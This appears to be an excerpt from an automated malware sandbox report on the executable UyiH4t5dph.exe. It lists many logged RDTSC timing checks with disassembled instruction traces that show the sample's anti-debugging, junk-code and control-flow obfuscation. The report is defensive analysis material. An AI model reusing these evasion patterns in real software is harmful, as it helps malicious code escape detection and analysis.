0x0000004a push edx 0x0000004b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA45E second address: 4FA470 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA470 second address: 4FA47E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FA47E second address: 4FA485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC353 second address: 4FC358 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC50E second address: 4FC539 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FE6E8F184BFh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC539 second address: 4FC59A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push ebx 0x0000000c call 00007FE6E8B29088h 0x00000011 pop ebx 0x00000012 mov dword ptr [esp+04h], ebx 0x00000016 add dword ptr [esp+04h], 00000018h 0x0000001e inc ebx 0x0000001f push ebx 0x00000020 ret 0x00000021 pop ebx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2531h], ebx 0x00000029 cmc 0x0000002a push dword ptr fs:[00000000h] 0x00000031 add ebx, 5DCE54C1h 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e sbb bx, 0D8Ah 0x00000043 mov eax, dword ptr [ebp+122D0601h] 0x00000049 pushad 0x0000004a mov bh, DAh 0x0000004c sbb cx, 0831h 0x00000051 popad 0x00000052 push FFFFFFFFh 0x00000054 nop 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC59A second address: 4FC5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC5AE second address: 4FC5BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC5BF second address: 4FC5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FC5C3 second address: 4FC5C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF408 second address: 4FF40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF40C second address: 4FF411 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF411 second address: 4FF43E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FE6E8F184C6h 0x0000000b jng 00007FE6E8F184B6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a push ebx 0x0000001b pop ebx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF43E second address: 4FF444 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF444 second address: 4FF44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF44C second address: 4FF456 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF456 second address: 4FF45C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF45C second address: 4FF460 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FF460 second address: 4FF464 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FD598 second address: 4FD59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B353D second address: 4B3564 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE6E8F184B6h 0x00000008 jmp 00007FE6E8F184C3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 js 00007FE6E8F184B6h 0x00000017 push ebx 0x00000018 pop ebx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4B3564 second address: 4B3568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FD59E second address: 4FD5A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FFA8D second address: 4FFA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jnc 00007FE6E8B29086h 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FFA9D second address: 4FFAA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 4FFAA3 second address: 4FFAA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 500D70 second address: 500D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FE6E8F184B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 502A81 second address: 502A99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8B29094h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 503A8C second address: 503B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FE6E8F184C1h 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edx 0x0000001a call 00007FE6E8F184B8h 0x0000001f pop edx 0x00000020 mov dword ptr [esp+04h], edx 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc edx 0x0000002d push edx 0x0000002e ret 0x0000002f pop edx 0x00000030 ret 0x00000031 xor bx, 36D6h 0x00000036 push 00000000h 0x00000038 add dword ptr [ebp+12456564h], edi 0x0000003e push 00000000h 0x00000040 push 00000000h 0x00000042 push ebx 0x00000043 call 00007FE6E8F184B8h 0x00000048 pop ebx 0x00000049 mov dword ptr [esp+04h], ebx 0x0000004d add dword ptr [esp+04h], 0000001Bh 0x00000055 inc ebx 0x00000056 push ebx 0x00000057 ret 0x00000058 pop ebx 0x00000059 ret 0x0000005a push esi 0x0000005b or bh, 00000012h 0x0000005e pop edi 0x0000005f xchg eax, esi 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jng 00007FE6E8F184B6h 0x0000006a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 503B20 second address: 503B26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 502CE1 second address: 502D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1D00h], esi 0x0000000f push edx 0x00000010 mov edi, dword ptr [ebp+122D2BB8h] 0x00000016 pop ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e add ebx, 7128DB06h 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b mov eax, dword ptr [ebp+122D06F1h] 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007FE6E8F184B8h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b cld 0x0000004c push FFFFFFFFh 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FE6E8F184B8h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000017h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 jg 00007FE6E8F184BCh 0x0000006e mov edi, ebx 0x00000070 or dword ptr [ebp+122D2AE3h], esi 0x00000076 push eax 0x00000077 je 00007FE6E8F184CDh 0x0000007d push eax 0x0000007e push edx 0x0000007f jmp 00007FE6E8F184BBh 0x00000084 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 503D47 second address: 503D51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FE6E8B29086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 505A86 second address: 505AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp], eax 0x00000007 call 00007FE6E8F184C9h 0x0000000c mov di, dx 0x0000000f pop ebx 0x00000010 pushad 0x00000011 sub dword ptr [ebp+122D31B5h], eax 0x00000017 sub dword ptr [ebp+122D3158h], edx 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push ecx 0x00000025 call 00007FE6E8F184B8h 0x0000002a pop ecx 0x0000002b mov dword ptr [esp+04h], ecx 0x0000002f add dword ptr [esp+04h], 00000017h 0x00000037 inc ecx 0x00000038 push ecx 0x00000039 ret 0x0000003a pop ecx 0x0000003b ret 0x0000003c jns 00007FE6E8F184BBh 0x00000042 mov ebx, edx 0x00000044 push eax 0x00000045 jc 00007FE6E8F184BEh 0x0000004b push edi 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 504D23 second address: 504D27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 505C57 second address: 505C5C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 508067 second address: 5080E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FE6E8B29088h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 pushad 0x00000023 call 00007FE6E8B29090h 0x00000028 mov dword ptr [ebp+122D212Dh], edx 0x0000002e pop ebx 0x0000002f or dword ptr [ebp+122D3860h], ebx 0x00000035 popad 0x00000036 push 00000000h 0x00000038 sub bl, FFFFFFC6h 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebp 0x00000040 call 00007FE6E8B29088h 0x00000045 pop ebp 0x00000046 mov dword ptr [esp+04h], ebp 0x0000004a add dword ptr [esp+04h], 00000015h 0x00000052 inc ebp 0x00000053 push ebp 0x00000054 ret 0x00000055 pop ebp 0x00000056 ret 0x00000057 mov dword ptr [ebp+1247E58Dh], edi 0x0000005d push eax 0x0000005e pushad 0x0000005f push eax 0x00000060 push edx 0x00000061 push edx 0x00000062 pop edx 0x00000063 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5080E3 second address: 5080E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 508236 second address: 5082B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a sub dword ptr [ebp+122D3865h], eax 0x00000010 push dword ptr fs:[00000000h] 0x00000017 jo 00007FE6E8B2908Ch 0x0000001d mov edi, dword ptr [ebp+12450CC6h] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a mov di, 7511h 0x0000002e mov eax, dword ptr [ebp+122D04EDh] 0x00000034 jmp 00007FE6E8B2908Ch 0x00000039 push FFFFFFFFh 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007FE6E8B29088h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 00000016h 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 nop 0x00000056 push eax 0x00000057 push edx 0x00000058 js 00007FE6E8B2909Fh 0x0000005e jmp 00007FE6E8B29099h 0x00000063 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5082B8 second address: 5082E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FE6E8F184B8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5082E0 second address: 5082E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 5082E6 second address: 5082EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 50EF29 second address: 50EF2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 50E85D second address: 50E86D instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE6E8F184C2h 0x00000008 jo 00007FE6E8F184B6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 50E86D second address: 50E876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514882 second address: 514888 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514888 second address: 5148DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e push esi 0x0000000f jmp 00007FE6E8B29096h 0x00000014 pop esi 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a push ecx 0x0000001b push esi 0x0000001c pushad 0x0000001d popad 0x0000001e pop esi 0x0000001f pop ecx 0x00000020 mov eax, dword ptr [eax] 0x00000022 jno 00007FE6E8B29092h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c pushad 0x0000002d jo 00007FE6E8B29088h 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 pop esi 0x00000039 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514BA8 second address: 514BCF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007FE6E8F184B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514BCF second address: 514BDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FE6E8B29086h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514BDC second address: 514C11 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push ebx 0x0000000c push eax 0x0000000d jmp 00007FE6E8F184C6h 0x00000012 pop eax 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jo 00007FE6E8F184BCh 0x0000001e jbe 00007FE6E8F184B6h 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514C11 second address: 514C35 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FE6E8B2908Eh 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 je 00007FE6E8B29086h 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514C35 second address: 514C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FE6E8F184B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 514C3F second address: 33EEE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 jmp 00007FE6E8B2908Dh 0x0000000e push dword ptr [ebp+122D0EB9h] 0x00000014 pushad 0x00000015 jmp 00007FE6E8B29091h 0x0000001a add eax, 62F2E408h 0x00000020 popad 0x00000021 call dword ptr [ebp+122D24F1h] 0x00000027 pushad 0x00000028 mov dword ptr [ebp+122D24B3h], esi 0x0000002e xor eax, eax 0x00000030 ja 00007FE6E8B29092h 0x00000036 jnc 00007FE6E8B2908Ch 0x0000003c mov edx, dword ptr [esp+28h] 0x00000040 js 00007FE6E8B2908Ch 0x00000046 mov dword ptr [ebp+122D2950h], edi 0x0000004c mov dword ptr [ebp+122D2950h], ecx 0x00000052 mov dword ptr [ebp+122D2C8Ch], eax 0x00000058 sub dword ptr [ebp+122D24B3h], ecx 0x0000005e mov esi, 0000003Ch 0x00000063 mov dword ptr [ebp+122D2A2Dh], edi 0x00000069 add esi, dword ptr [esp+24h] 0x0000006d pushad 0x0000006e or dword ptr [ebp+122D2A2Dh], ebx 0x00000074 popad 0x00000075 lodsw 0x00000077 jmp 00007FE6E8B29096h 0x0000007c add eax, dword ptr [esp+24h] 0x00000080 add dword ptr [ebp+122D2A2Dh], eax 0x00000086 mov ebx, dword ptr [esp+24h] 0x0000008a cld 0x0000008b push eax 0x0000008c push eax 0x0000008d push edx 0x0000008e jmp 00007FE6E8B2908Ch 0x00000093 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518B04 second address: 518B0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518C6B second address: 518C71 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518C71 second address: 518C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jng 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518DA5 second address: 518DA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518DA9 second address: 518DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518DAD second address: 518DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FE6E8B29086h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518DC1 second address: 518DC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518DC7 second address: 518DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518F1D second address: 518F31 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007FE6E8F184B6h 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FE6E8F184B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518F31 second address: 518F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518F35 second address: 518F55 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE6E8F184BFh 0x00000007 jo 00007FE6E8F184B6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 518F55 second address: 518F5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FE6E8B29086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 519112 second address: 519117 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 519462 second address: 519468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51C496 second address: 51C4BE instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jo 00007FE6E8F184B6h 0x00000009 jmp 00007FE6E8F184C6h 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007FE6E8F184B6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\UyiH4t5dph.exe	RDTSC instruction interceptor: First address: 51C4BE second address: 51C4EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FE6E8B2908Ch 0x00000011 jbe 00007FE6E8B29092h 0x00000017 js 00007FE6E8B29092h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
